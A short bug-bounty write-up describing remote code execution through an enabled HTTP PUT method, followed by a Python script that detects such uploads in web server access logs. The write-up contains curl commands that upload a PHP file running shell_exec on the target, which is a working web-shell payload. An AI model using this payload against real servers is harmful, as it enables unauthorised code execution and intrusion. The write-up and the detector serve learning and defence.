RCE via server misconfiguration: PUT HTTP method enabled
Hey guys, today I want to talk about the first RCE I found, on a private program on "hackerone.com", with my best friend "Ahmed elmalkey".
First we did subdomain enumeration with many tools, like "subfinder with API keys". Once we had the subdomains, we went to check which ones were live. After that
we sent the live subdomains to Nuclei. After 5 minutes we got an alert: "http method enabled". "Oh no, is this real or a false positive?" we said.
We went to check whether the alert was real or not:
curl -i -X OPTIONS https://target.tld
GET, PUT, HEAD enabled. Hey, this is real! Now we went to make a PoC:
curl -X PUT https://target.tld/POC.php \
  -H "Accept: */*" \
  -d '<?php
$output = shell_exec("ls -lart");
echo "<pre>$output</pre>";
?>'
Now we had RCE on the server. Done.
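The request sequence in this write-up (a successful PUT of a script file, then a request for that same path) is easy to hunt for in web server access logs. The following is an added example, not part of the original write-up: it assumes the combined access log format, and the function name, extension list and sample log lines are constructed for illustration.

```python
import re

# Combined-log-format prefix: client, request method, target, status (assumed format).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# Extensions a web server may hand to an interpreter (illustrative list, an assumption).
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx", ".cgi")


def find_put_uploads(lines):
    """Return one finding per script file created by a successful PUT.

    'executed' becomes True when the same path is later served with a 200,
    which suggests the uploaded file was reachable and run by the server.
    """
    findings = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that do not match the expected format
        client, method, target = m.group(1), m.group(2), m.group(3)
        status = int(m.group(4))
        path = target.split("?", 1)[0]  # drop any query string
        if method == "PUT" and 200 <= status < 300 and path.lower().endswith(SCRIPT_EXT):
            findings[path] = {"client": client, "path": path,
                              "put_status": status, "executed": False}
        elif method in ("GET", "POST") and status == 200 and path in findings:
            findings[path]["executed"] = True
    return list(findings.values())


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "PUT /POC.php HTTP/1.1" 201 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /POC.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "PUT /notes.txt HTTP/1.1" 201 0 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "PUT /x.php HTTP/1.1" 405 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in find_put_uploads(SAMPLE_LOG):
        print(finding)
```

A finding with `executed` set to True is the case to triage first; the rejected PUT (405) and the non-script upload are deliberately not reported.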
Thanks for reading the essay, and I'm sorry for any misspellings because this is my first writeup.